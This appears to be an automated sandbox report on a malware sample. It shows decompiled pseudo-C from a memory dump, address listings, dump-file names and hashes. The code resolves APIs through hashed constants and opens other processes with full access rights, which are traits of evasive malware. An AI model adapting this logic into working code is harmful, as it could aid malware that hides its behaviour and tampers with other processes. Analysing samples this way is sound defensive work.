				E1000F4E0( &_v256, 0xc0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a8], xmm0");
				E1000F4E0( &_v260, 0xd0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b0], xmm0");
				E1000F4E0( &_v264, 0xe0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b8], xmm0");
				E1000F4E0( &_v268, 0xf0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c0], xmm0");
				E1000F4E0( &_v272, 0x100);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c8], xmm0");
				_t282 = E1000F4E0( &_v276, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp], xmm0");
				_v252 = E10001D2C(_v248, _t434, _t481, _t282, _t282);
				_t318 = _t434;
				E1000B2C0( &_v248, _v256, _t481, _v252, _t318);
				E1000F864( &_v296, _t481);
				_v300 = 0;
				_t410 =  &_v296;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v296 + 0x10)) = 0xa09bf9c8;
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v296, E1000F4F0(_t410) + 0x10);
				E1000F4E0( &_v300, E1000F4F0( &_v300) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v308 = _v308 + 1;
				_t414 =  &_v304;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v304 + 0x10)) = 0x2b5b930c;
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v304, E1000F4F0(_t414) + 0x10);
				E1000F4E0( &_v308, E1000F4F0( &_v308) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v316 = _v316 + 1;
				_t418 =  &_v312;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v312 + 0x10)) = 0x453267ca;
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v312, E1000F4F0(_t418) + 0x10);
				E1000F4E0( &_v316, E1000F4F0( &_v316) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v324 = _v324 + 1;
				_t422 =  &_v320;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v320 + 0x10)) = 0xb38fc5b8;
				asm("movq [ecx+0x18], xmm0");
				E1000F84C( &_v320, E1000F4F0(_t422) + 0x10);
				E1000F4E0( &_v324, E1000F4F0( &_v324) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *_t480 =  *_t480 + 1;
				_t310 = _t480;
				_push(_t310);
				_push(_t318);
				_push(_v292);
				_t154 = _t310 + 0x2c; // 0x2c
				E1000BA40(_t154,  *_t480);
				E1000F4E0( &_v340, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d8], xmm0");
				E1000F4E0( &_v344, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e0], xmm0");
				E1000F4E0( &_v348, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d0], xmm0");
				E1000F4E0( &_v352, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e8], xmm0");
				E1000F678( &_v316);
				return E1000F678( &_v356);
			}

0x10001494
0x10001498
0x1000149d
0x100014a3
0x100014ab
0x100014b0
0x100014bc
0x100014c0
0x100014d2
0x100014e8
0x100014f3
0x100014f4
0x100014f5
0x100014f6
0x100014f7
0x100014fa
0x100014fe
0x10001502
0x10001509
0x1000151b
0x10001531
0x1000153c
0x1000153d
0x1000153e
0x1000153f
0x10001540
0x10001543
0x10001547
0x1000154b
0x10001552
0x10001564
0x1000157a
0x10001585
0x10001586
0x10001587
0x10001588
0x10001589
0x1000158c
0x10001590
0x10001594
0x1000159b
0x100015ad
0x100015c3
0x100015ce
0x100015cf
0x100015d0
0x100015d1
0x100015d2
0x100015d5
0x100015d9
0x100015dd
0x100015e4
0x100015f6
0x1000160c
0x10001617
0x10001618
0x10001619
0x1000161a
0x1000161b
0x1000161e
0x10001622
0x10001626
0x1000162d
0x1000163f
0x10001655
0x10001660
0x10001661
0x10001662
0x10001663
0x10001664
0x10001667
0x1000166b
0x1000166f
0x10001676
0x10001688
0x1000169e
0x100016a9
0x100016aa
0x100016ab
0x100016ac
0x100016ad
0x100016b0
0x100016b4
0x100016b8
0x100016bf
0x100016d1
0x100016e7
0x100016f2
0x100016f3
0x100016f4
0x100016f5
0x100016f6
0x100016f9
0x100016fd
0x10001701
0x10001708
0x1000171a
0x10001730
0x1000173b
0x1000173c
0x1000173d
0x1000173e
0x1000173f
0x10001742
0x10001746
0x1000174a
0x10001751
0x10001763
0x10001779
0x10001784
0x10001785
0x10001786
0x10001787
0x10001788
0x1000178b
0x1000178f
0x10001793
0x1000179a
0x100017ac
0x100017c2
0x100017cd
0x100017ce
0x100017cf
0x100017d0
0x100017d1
0x100017d4
0x100017d8
0x100017dc
0x100017e3
0x100017f5
0x1000180b
0x10001816
0x10001817
0x10001818
0x10001819
0x1000181a
0x1000181d
0x10001821
0x10001825
0x1000182c
0x1000183e
0x10001854
0x1000185f
0x10001860
0x10001861
0x10001862
0x10001863
0x10001866
0x1000186a
0x1000186e
0x10001875
0x10001887
0x1000189d
0x100018a8
0x100018a9
0x100018aa
0x100018ab
0x100018ac
0x100018af
0x100018b3
0x100018b7
0x100018be
0x100018d0
0x100018e6
0x100018f1
0x100018f2
0x100018f3
0x100018f4
0x100018f5
0x100018f8
0x100018fc
0x10001900
0x10001907
0x10001919
0x1000192f
0x1000193a
0x1000193b
0x1000193c
0x1000193d
0x1000193e
0x10001941
0x10001945
0x10001949
0x10001950
0x10001962
0x10001978
0x10001983
0x10001984
0x10001985
0x10001986
0x1000198c
0x1000198f
0x10001991
0x1000199c
0x100019a3
0x100019ac
0x100019b4
0x100019bb
0x100019c4
0x100019cc
0x100019d3
0x100019dc
0x100019e4
0x100019eb
0x100019f4
0x100019fc
0x10001a03
0x10001a0c
0x10001a14
0x10001a1b
0x10001a24
0x10001a2c
0x10001a36
0x10001a3f
0x10001a47
0x10001a51
0x10001a5a
0x10001a62
0x10001a6c
0x10001a75
0x10001a7d
0x10001a87
0x10001a90
0x10001a98
0x10001aa2
0x10001aab
0x10001ab3
0x10001abd
0x10001ac6
0x10001ace
0x10001ad8
0x10001ae1
0x10001ae9
0x10001af3
0x10001afc
0x10001b04
0x10001b0e
0x10001b17
0x10001b1f
0x10001b26
0x10001b2f
0x10001b37
0x10001b3e
0x10001b43
0x10001b51
0x10001b55
0x10001b64
0x10001b6d
0x10001b72
0x10001b79
0x10001b7d
0x10001b81
0x10001b88
0x10001b9a
0x10001bb0
0x10001bbb
0x10001bbc
0x10001bbd
0x10001bbe
0x10001bbf
0x10001bc2
0x10001bc6
0x10001bca
0x10001bd1
0x10001be3
0x10001bf9
0x10001c04
0x10001c05
0x10001c06
0x10001c07
0x10001c08
0x10001c0b
0x10001c0f
0x10001c13
0x10001c1a
0x10001c2c
0x10001c42
0x10001c4d
0x10001c4e
0x10001c4f
0x10001c50
0x10001c51
0x10001c54
0x10001c58
0x10001c5c
0x10001c63
0x10001c75
0x10001c8b
0x10001c96
0x10001c97
0x10001c98
0x10001c99
0x10001c9a
0x10001c9d
0x10001ca0
0x10001ca1
0x10001ca2
0x10001ca9
0x10001cac
0x10001cb7
0x10001cbe
0x10001cc7
0x10001ccf
0x10001cd6
0x10001cdf
0x10001ce7
0x10001cee
0x10001cf7
0x10001cff
0x10001d04
0x10001d0d
0x10001d15
0x10001d2a

Strings

g , xrefs: 100017DC

Memory Dump Source

Source File: 00000003.00000002.2363961499.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2363931255.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2363999351.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2364007363.000000001001D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.2364025203.000000001001F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: g
API String ID: 0-171373902
Opcode ID: 162cb203cf16dc31ffe4151c904b38d9bb82240b89b720d6c543ceb59c6b7c0f
Instruction ID: b442155eacf7675d39859fb34eebdae8123254ffe159dd47b7877bbbb04c0330
Opcode Fuzzy Hash: 162cb203cf16dc31ffe4151c904b38d9bb82240b89b720d6c543ceb59c6b7c0f
Instruction Fuzzy Hash: 1032C6764047059AD705DF24C852AFFB3A0EFA2388F10871DB8896A1A7FF71F985D681

Uniqueness

Uniqueness Score: -1.00%

Function 1000A52C, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E1000A52C(signed int* __ecx, void* __eflags) {
				void* __esi;
				void* __ebp;
				void* _t182;
				signed int _t183;
				signed int* _t188;
				void* _t198;
				void* _t199;
				void* _t228;
				void* _t229;
				void* _t242;
				void* _t243;
				void* _t251;
				signed int* _t271;
				void* _t282;
				void* _t284;
				void* _t285;
				void* _t296;
				signed int* _t308;
				void* _t324;
				signed int _t398;
				signed int _t402;
				intOrPtr* _t403;
				intOrPtr* _t404;
				signed int _t406;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t412;
				void* _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t419;
				void* _t420;
				signed int _t421;
				void* _t422;
				signed int _t424;
				signed int _t429;
				signed int _t433;
				signed int _t434;
				signed int _t437;
				intOrPtr* _t439;

				_t308 = __ecx;
				 *(_t439 + 0x78) = 0;
				 *_t439 = __ecx + 8;
				 *((intOrPtr*)(_t439 + 4)) = __ecx + 0x20;
				while(1) {
					_t392 =  *_t308;
					E1000B69C(_t439 + 0x24, _t392, 0x7fffffff);
					if(E1000F4F4(_t439 + 0x24) == 0) {
						goto L3;
					} else {
						_t308[0xc] = 0;
						E1000F678(_t439 + 0x24);
					}
					L63:
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					L65:
					if((_t407 | _t398) != 0) {
						L68:
						return _t407;
					}
					if( *(_t439 + 0x78) != 0x20) {
						E1001223C(0x5dc, _t392, _t407);
						 *(_t439 + 0x78) =  *(_t439 + 0x78) + 1;
						continue;
					}
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					goto L68;
					L3:
					__eflags = _t308[1];
					if(_t308[1] <= 0) {
						L21:
						__eflags =  *(_t439 + 0x20);
						if( *(_t439 + 0x20) <= 0) {
							L33:
							E1000F678(_t439 + 0x24);
							__eflags = _t308[0xc];
							if(_t308[0xc] == 0) {
								L46:
								 *((intOrPtr*)(_t439 + 8)) = 0;
								 *((intOrPtr*)(_t439 + 0xc)) = 0;
								E1000F5A8(_t439 + 0x14, 0);
								 *((intOrPtr*)(_t439 + 0x38)) = 0;
								 *(_t439 + 0x34) =  *_t308;
								E1000F5A8(_t439 + 0x40, 0);
								_t182 = 0x40;
								__eflags = _t308[7] - 0x40;
								_t183 =  <  ? _t308[7] : _t182;
								 *(_t439 + 0x74) = _t183;
								__eflags = _t183;
								if(_t183 <= 0) {
									L57:
									asm("movq xmm0, [0x1001b808]");
									asm("movq [esp+0x84], xmm0");
									_t406 = E1001303C(0xfe338407, 0x8a79536f);
									__eflags = _t406;
									if(_t406 == 0) {
										_t424 = 0;
										__eflags = 0;
										L61:
										__eflags = _t424 - 0x3f;
										if(_t424 <= 0x3f) {
											__eflags = _t424 << 2;
											_t308[0xc] =  *(E1000F4E0( *((intOrPtr*)(_t439 + 8)), _t424 << 2));
											_t188 = E1000F4E0( *((intOrPtr*)(_t439 + 4)), _t424 << 2);
											_t407 = _t308[0xc];
											asm("cdq");
											_t308[0xd] =  *_t188;
											_t398 = _t392;
											E1000B608(_t439 + 0x34);
											E1000B608(_t439 + 8);
											goto L65;
										}
										L62:
										E1000B608(_t439 + 0x34);
										E1000B608(_t439 + 8);
										goto L63;
									}
									_t392 = E1000F4E0(_t439 + 0x14, 0);
									_t198 =  *_t406( *((intOrPtr*)(_t439 + 0xc)), _t392, 1, 0, _t439 + 0x84);
									_t133 = _t198 - 0x80; // -128
									_t199 = _t133;
									__eflags = _t199 - 0x3f;
									_t424 =  <=  ? _t199 : _t198;
									__eflags = _t424 - 0x102;
									if(_t424 == 0x102) {
										goto L62;
									}
									goto L61;
								}
								_t437 = 0;
								__eflags = 0;
								while(1) {
									E1000CAD0(_t439 + 0x4c);
									_t392 = 0;
									_t324 = _t439 + 0x4c;
									 *((char*)(_t324 + 4)) = 0;
									 *((intOrPtr*)(_t324 + 0x1c)) = 0;
									__eflags = E1000C2C4(_t324);
									if(__eflags != 0) {
										break;
									}
									E1000F84C(_t439 + 0x14, E1000F4F0(_t439 + 0x10) + 4);
									 *((intOrPtr*)(E1000F4E0(_t439 + 0x14, E1000F4F0(_t439 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t439 + 0x4c));
									 *((intOrPtr*)(_t439 + 0xc)) =  *((intOrPtr*)(_t439 + 0xc)) + 1;
									_t409 = E1001303C(0xfe338407, 0xa8c8a645);
									__eflags = _t409;
									if(_t409 == 0) {
										L51:
										_t392 =  *(_t439 + 0x68);
										__eflags = _t392;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t392 - 0xffffffff;
										if(__eflags != 0) {
											E1000F84C(_t439 + 0x40, E1000F4F0(_t439 + 0x3c) + 4);
											 *(E1000F4E0(_t439 + 0x40, E1000F4F0(_t439 + 0x3c) + 0xfffffffc)) =  *(_t439 + 0x68);
											 *((intOrPtr*)(_t439 + 0x4c - 0x14)) =  *((intOrPtr*)(_t439 + 0x4c - 0x14)) + 1;
											E1000CD68(_t439 + 0x4c, __eflags);
											_t437 = _t437 + 1;
											__eflags = _t437 -  *(_t439 + 0x74);
											if(_t437 <  *(_t439 + 0x74)) {
												continue;
											}
											_t411 = 0;
											__eflags = 0;
											do {
												E1000F4E0( *((intOrPtr*)(_t439 + 8)), _t411 * 4);
												E1000F4E0(_t439 + 0x40, _t411 * 4);
												_t439 = _t439 + 0xffffffd8;
												asm("cdq");
												asm("pxor xmm5, xmm5");
												asm("movd xmm1, dword [ebp]");
												asm("movd xmm4, dword [edi]");
												asm("movd xmm0, edx");
												asm("cdq");
												asm("punpckldq xmm1, xmm0");
												asm("movq xmm2, [ebx+0x38]");
												asm("movq [esp], xmm1");
												asm("movd xmm3, edx");
												asm("punpckldq xmm4, xmm3");
												asm("movq [esp+0x8], xmm2");
												asm("movq [esp+0x10], xmm4");
												asm("movq [esp+0x18], xmm5");
												asm("movq [esp+0x20], xmm5");
												E1000AC8C(__eflags);
												_t411 = _t411 + 1;
												__eflags = _t411 -  *(_t439 + 0x74);
											} while (_t411 <  *(_t439 + 0x74));
											goto L57;
										}
										break;
									}
									_t392 = _t439 + 0x68;
									 *_t409(0xffffffff,  *((intOrPtr*)(_t439 + 0x60)),  *_t308, _t439 + 0x68, 0, 0, 2);
									__eflags = 0;
									if(0 != 0) {
										break;
									}
									goto L51;
								}
								E1000CD68(_t439 + 0x4c, __eflags);
								goto L62;
							}
							_t402 = _t308[1];
							__eflags = _t402;
							if(_t402 <= 0) {
								goto L46;
							}
							_t412 = 0;
							__eflags = 0;
							while(1) {
								_t429 = _t412 * 4;
								_t392 =  *(E1000F4E0( *((intOrPtr*)(_t439 + 4)), _t429));
								__eflags = _t392 - _t308[0xd];
								if(_t392 == _t308[0xd]) {
									break;
								}
								_t412 = _t412 + 1;
								__eflags = _t412 - _t402;
								if(_t412 < _t402) {
									continue;
								}
								goto L46;
							}
							__eflags = _t412 - 0xffffffff;
							if(_t412 != 0xffffffff) {
								_t228 = E1000F4F0( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t228 - _t429;
								if(_t228 > _t429) {
									_t392 = 4 + _t412 * 4;
									 *(_t439 + 0x6c) = _t392;
									_t251 = E1000F4F0( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t251 -  *(_t439 + 0x6c);
									if(_t251 >  *(_t439 + 0x6c)) {
										 *((intOrPtr*)(_t439 + 0x90)) = E1000F4E0( *((intOrPtr*)(_t439 + 8)), _t429);
										 *((intOrPtr*)(_t439 + 0x8c)) = E1000F4E0( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x6c));
										E100138C8( *((intOrPtr*)(_t439 + 0x98)),  *((intOrPtr*)(_t439 + 0x90)), E1000F4F0( *((intOrPtr*)(_t439 + 4))) -  *(_t439 + 0x6c));
										_t439 = _t439 + 0xc;
									}
									E1000F84C( *((intOrPtr*)(_t439 + 8)), E1000F4F0( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t74 =  &(_t308[7]);
									 *_t74 = _t308[7] - 1;
									__eflags =  *_t74;
								}
								_t229 = E1000F4F0( *_t439);
								__eflags = _t229 - _t429;
								if(_t229 > _t429) {
									_t413 = 4 + _t412 * 4;
									_t242 = E1000F4F0( *_t439);
									__eflags = _t242 - _t413;
									if(_t242 > _t413) {
										_t243 = E1000F4E0( *((intOrPtr*)(_t439 + 4)), _t429);
										 *((intOrPtr*)(_t439 + 0x94)) = E1000F4E0( *((intOrPtr*)(_t439 + 4)), _t413);
										E100138C8(_t243,  *((intOrPtr*)(_t439 + 0x98)), E1000F4F0( *_t439) - _t413);
										_t439 = _t439 + 0xc;
									}
									E1000F84C( *((intOrPtr*)(_t439 + 4)), E1000F4F0( *_t439) + 0xfffffffc);
									_t79 =  &(_t308[1]);
									 *_t79 = _t308[1] - 1;
									__eflags =  *_t79;
								}
								E1000F84C( *((intOrPtr*)(_t439 + 8)), E1000F4F0( *((intOrPtr*)(_t439 + 4))) + 4);
								 *(E1000F4E0( *((intOrPtr*)(_t439 + 8)), E1000F4F0( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t308[0xc];
								_t308[7] = _t308[7] + 1;
								E1000F84C( *((intOrPtr*)(_t439 + 4)), E1000F4F0( *_t439) + 4);
								 *(E1000F4E0( *((intOrPtr*)(_t439 + 4)), E1000F4F0( *_t439) + 0xfffffffc)) = _t308[0xd];
								_t308[1] = _t308[1] + 1;
							}
							goto L46;
						}
						_t433 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x70) = _t433 * 4;
							_t403 = E1000F4E0(_t439 + 0x28, _t433 * 4);
							_t392 = _t308[1];
							 *(_t439 + 0x80) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L29:
								_t414 = E1001303C(0x10154545, 0xc2a75cb8);
								__eflags = _t414;
								if(_t414 != 0) {
									_t416 =  *_t414(0x1fffff, 0,  *((intOrPtr*)(E1000F4E0(_t439 + 0x28,  *(_t439 + 0x70)))));
									__eflags = _t416;
									if(_t416 != 0) {
										E1000F84C( *((intOrPtr*)(_t439 + 8)), E1000F4F0( *((intOrPtr*)(_t439 + 4))) + 4);
										 *(E1000F4E0( *((intOrPtr*)(_t439 + 8)), E1000F4F0( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t416;
										_t308[7] = _t308[7] + 1;
										_t271 = E1000F4E0(_t439 + 0x28,  *(_t439 + 0x70));
										E1000F84C( *((intOrPtr*)(_t439 + 4)), E1000F4F0( *_t439) + 4);
										 *(E1000F4E0( *((intOrPtr*)(_t439 + 4)), E1000F4F0( *_t439) + 0xfffffffc)) =  *_t271;
										_t57 =  &(_t308[1]);
										 *_t57 = _t308[1] + 1;
										__eflags =  *_t57;
									}
								}
								goto L32;
							}
							_t415 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E1000F4E0( *((intOrPtr*)(_t439 + 4)), _t415 * 4));
								__eflags = _t392 -  *_t403;
								if(_t392 ==  *_t403) {
									break;
								}
								_t415 = _t415 + 1;
								__eflags = _t415 -  *(_t439 + 0x80);
								if(_t415 <  *(_t439 + 0x80)) {
									continue;
								}
								goto L29;
							}
							__eflags = _t415 - 0xffffffff;
							if(_t415 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t433 = _t433 + 1;
							__eflags = _t433 -  *(_t439 + 0x20);
						} while (_t433 <  *(_t439 + 0x20));
						goto L33;
					} else {
						_t434 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x64) = _t434 * 4;
							_t404 = E1000F4E0( *((intOrPtr*)(_t439 + 4)), _t434 * 4);
							_t392 =  *(_t439 + 0x20);
							 *(_t439 + 0x7c) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L11:
								_t282 = E1000F4F0( *_t439);
								__eflags = _t282 -  *(_t439 + 0x64);
								if(_t282 >  *(_t439 + 0x64)) {
									_t420 = 4 + _t434 * 4;
									_t296 = E1000F4F0( *_t439);
									__eflags = _t296 - _t420;
									if(_t296 > _t420) {
										 *((intOrPtr*)(_t439 + 0x9c)) = E1000F4E0( *((intOrPtr*)(_t439 + 4)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0x98)) = E1000F4E0( *((intOrPtr*)(_t439 + 4)), _t420);
										E100138C8( *((intOrPtr*)(_t439 + 0xa4)),  *((intOrPtr*)(_t439 + 0x9c)), E1000F4F0( *_t439) - _t420);
										_t439 = _t439 + 0xc;
									}
									E1000F84C( *((intOrPtr*)(_t439 + 4)), E1000F4F0( *_t439) + 0xfffffffc);
									_t22 =  &(_t308[1]);
									 *_t22 = _t308[1] - 1;
									__eflags =  *_t22;
								}
								_t419 = E1001303C(0xfe338407, 0x77fa1d17);
								__eflags = _t419;
								if(_t419 != 0) {
									 *_t419( *((intOrPtr*)(E1000F4E0( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64)))));
								}
								_t284 = E1000F4F0( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t284 -  *(_t439 + 0x64);
								if(_t284 >  *(_t439 + 0x64)) {
									_t422 = 4 + _t434 * 4;
									_t285 = E1000F4F0( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t285 - _t422;
									if(_t285 > _t422) {
										 *((intOrPtr*)(_t439 + 0xa4)) = E1000F4E0( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0xa0)) = E1000F4E0( *((intOrPtr*)(_t439 + 8)), _t422);
										E100138C8( *((intOrPtr*)(_t439 + 0xac)),  *((intOrPtr*)(_t439 + 0xa4)), E1000F4F0( *((intOrPtr*)(_t439 + 4))) - _t422);
										_t439 = _t439 + 0xc;
									}
									E1000F84C( *((intOrPtr*)(_t439 + 8)), E1000F4F0( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t33 =  &(_t308[7]);
									 *_t33 = _t308[7] - 1;
									__eflags =  *_t33;
								}
								_t434 = _t434 - 1;
								__eflags = _t434;
								goto L20;
							}
							_t421 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E1000F4E0(_t439 + 0x28, _t421 * 4));
								__eflags = _t392 -  *_t404;
								if(_t392 ==  *_t404) {
									break;
								}
								_t421 = _t421 + 1;
								__eflags = _t421 -  *(_t439 + 0x7c);
								if(_t421 <  *(_t439 + 0x7c)) {
									continue;
								}
								goto L11;
							}
							__eflags = _t421 - 0xffffffff;
							if(_t421 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t434 = _t434 + 1;
							__eflags = _t434 - _t308[1];
						} while (_t434 < _t308[1]);
						goto L21;
					}
				}
			}

0x1000a536
0x1000a538
0x1000a543
0x1000a549
0x1000a54d
0x1000a552
0x1000a558
0x1000a568
0x00000000
0x1000a56a
0x1000a56a
0x1000a575
0x1000a575
0x1000aaf3
0x1000aaf5
0x1000aaf6
0x1000ab35
0x1000ab39
0x1000ab47
0x1000ab55
0x1000ab55
0x1000ab40
0x1000ab5b
0x1000ab60
0x00000000
0x1000ab60
0x1000ab44
0x1000ab45
0x00000000
0x1000a57f
0x1000a57f
0x1000a583
0x1000a68a
0x1000a68a
0x1000a68f
0x1000a7a0
0x1000a7a4
0x1000a7a9
0x1000a7ad
0x1000a8d7
0x1000a8d9
0x1000a8dd
0x1000a8e6
0x1000a8ef
0x1000a8f3
0x1000a8fc
0x1000a903
0x1000a904
0x1000a908
0x1000a90c
0x1000a910
0x1000a912
0x1000aa7c
0x1000aa7c
0x1000aa84
0x1000aa9c
0x1000aa9e
0x1000aaa0
0x1000aada
0x1000aada
0x1000aadc
0x1000aadc
0x1000aadf
0x1000aafa
0x1000ab0e
0x1000ab11
0x1000ab16
0x1000ab21
0x1000ab22
0x1000ab25
0x1000ab27
0x1000ab30
0x00000000
0x1000ab30
0x1000aae1
0x1000aae5
0x1000aaee
0x00000000
0x1000aaee
0x1000aab1
0x1000aac1
0x1000aac5
0x1000aac5
0x1000aac8
0x1000aacb
0x1000aace
0x1000aad4
0x00000000
0x00000000
0x00000000
0x1000aad6
0x1000a91a
0x1000a91a
0x1000a91c
0x1000a920
0x1000a925
0x1000a927
0x1000a92b
0x1000a92e
0x1000a936
0x1000a938
0x00000000
0x00000000
0x1000a94f
0x1000a96a
0x1000a96c
0x1000a97f
0x1000a981
0x1000a983
0x1000a99e
0x1000a99e
0x1000a9a2
0x1000a9a4
0x00000000
0x00000000
0x1000a9a6
0x1000a9a9
0x1000a9ca
0x1000a9e9
0x1000a9ef
0x1000a9f2
0x1000a9f7
0x1000a9f8
0x1000a9fc
0x00000000
0x00000000
0x1000aa04
0x1000aa04
0x1000aa06
0x1000aa12
0x1000aa1e
0x1000aa28
0x1000aa2b
0x1000aa2e
0x1000aa32
0x1000aa39
0x1000aa3d
0x1000aa41
0x1000aa42
0x1000aa46
0x1000aa4b
0x1000aa50
0x1000aa54
0x1000aa58
0x1000aa5e
0x1000aa64
0x1000aa6a
0x1000aa70
0x1000aa75
0x1000aa76
0x1000aa76
0x00000000
0x1000aa06
0x00000000
0x1000a9a9
0x1000a987
0x1000a998
0x1000a99a
0x1000a99c
0x00000000
0x00000000
0x00000000
0x1000a99c
0x1000a9af
0x00000000
0x1000a9af
0x1000a7b3
0x1000a7b6
0x1000a7b8
0x00000000
0x00000000
0x1000a7c0
0x1000a7c0
0x1000a7c2
0x1000a7c2
0x1000a7d3
0x1000a7d5
0x1000a7d8
0x00000000
0x00000000
0x1000a8ce
0x1000a8cf
0x1000a8d1
0x00000000
0x00000000
0x00000000
0x1000a8d1
0x1000a7de
0x1000a7e1
0x1000a7eb
0x1000a7f0
0x1000a7f2
0x1000a7f8
0x1000a7ff
0x1000a803
0x1000a808
0x1000a80c
0x1000ac47
0x1000ac5b
0x1000ac7e
0x1000ac83
0x1000ac83
0x1000a823
0x1000a828
0x1000a828
0x1000a828
0x1000a828
0x1000a82e
0x1000a833
0x1000a835
0x1000a83a
0x1000a841
0x1000a846
0x1000a848
0x1000ac05
0x1000ac16
0x1000ac30
0x1000ac35
0x1000ac35
0x1000a85e
0x1000a863
0x1000a863
0x1000a863
0x1000a863
0x1000a877
0x1000a895
0x1000a89a
0x1000a8aa
0x1000a8c7
0x1000a8c9
0x1000a8c9
0x00000000
0x1000a7e1
0x1000a697
0x1000a697
0x1000a699
0x1000a6a0
0x1000a6ae
0x1000a6b0
0x1000a6b3
0x1000a6ba
0x1000a6bc
0x1000a6ed
0x1000a6fc
0x1000a6fe
0x1000a700
0x1000a71e
0x1000a720
0x1000a722
0x1000a735
0x1000a754
0x1000a75a
0x1000a75d
0x1000a774
0x1000a790
0x1000a792
0x1000a792
0x1000a792
0x1000a792
0x1000a722
0x00000000
0x1000a700
0x1000a6c0
0x1000a6c0
0x1000a6c2
0x1000a6d3
0x1000a6d5
0x1000a6d7
0x00000000
0x00000000
0x1000a6e3
0x1000a6e4
0x1000a6eb
0x00000000
0x00000000
0x00000000
0x1000a6eb
0x1000a6d9
0x1000a6dc
0x00000000
0x00000000
0x1000a795
0x1000a795
0x1000a796
0x1000a796
0x00000000
0x1000a589
0x1000a58b
0x1000a58b
0x1000a58d
0x1000a594
0x1000a5a2
0x1000a5a4
0x1000a5a8
0x1000a5ac
0x1000a5ae
0x1000a5dc
0x1000a5df
0x1000a5e4
0x1000a5e8
0x1000a5ed
0x1000a5f4
0x1000a5f9
0x1000a5fb
0x1000abc2
0x1000abd3
0x1000abf3
0x1000abf8
0x1000abf8
0x1000a611
0x1000a616
0x1000a616
0x1000a616
0x1000a616
0x1000a628
0x1000a62a
0x1000a62c
0x1000a63d
0x1000a63d
0x1000a643
0x1000a648
0x1000a64c
0x1000a652
0x1000a659
0x1000a65e
0x1000a660
0x1000ab76
0x1000ab87
0x1000aba8
0x1000abad
0x1000abad
0x1000a677
0x1000a67c
0x1000a67c
0x1000a67c
0x1000a67c
0x1000a67f
0x1000a67f
0x00000000
0x1000a67f
0x1000a5b2
0x1000a5b2
0x1000a5b4
0x1000a5c5
0x1000a5c7
0x1000a5c9
0x00000000
0x00000000
0x1000a5d5
0x1000a5d6
0x1000a5da
0x00000000
0x00000000
0x00000000
0x1000a5da
0x1000a5cb
0x1000a5ce
0x00000000
0x00000000
0x1000a680
0x1000a680
0x1000a681
0x1000a681
0x00000000
0x1000a58d
0x1000a583

Strings

, xrefs: 1000AB3B

Memory Dump Source

Source File: 00000003.00000002.2363961499.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2363931255.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2363999351.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2364007363.000000001001D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.2364025203.000000001001F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: f6d1a7add298286a0714c8aa5ddbbd6a669f41b2ea832ff541077008ae5bfe0a
